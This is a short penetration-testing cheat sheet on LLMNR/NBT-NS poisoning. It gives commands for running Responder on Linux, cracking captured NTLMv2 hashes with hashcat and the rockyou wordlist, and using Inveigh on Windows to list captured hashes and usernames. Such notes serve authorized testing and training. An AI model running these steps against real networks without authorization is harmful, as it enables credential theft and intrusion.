LLMNR/NBT-NS Poisoning

Several tools can be used to attempt LLMNR & NBT-NS poisoning:

From Linux

# Starting Responder 
sudo responder -I ens224

# Cracking an NTLMv2 Hash With Hashcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

From Windows

# Using Inveigh C# version, powershell version is not updated
# Compile and run the executable
PS C:\> .\Inveigh.exe

# hit the esc key to enter the console while Inveigh is running.
# After typing HELP and hitting enter, we are presented with several options
# view unique captured hashes by typing GET NTLMV2UNIQUE
# type in GET NTLMV2USERNAMES and see which usernames we have collected

Last updated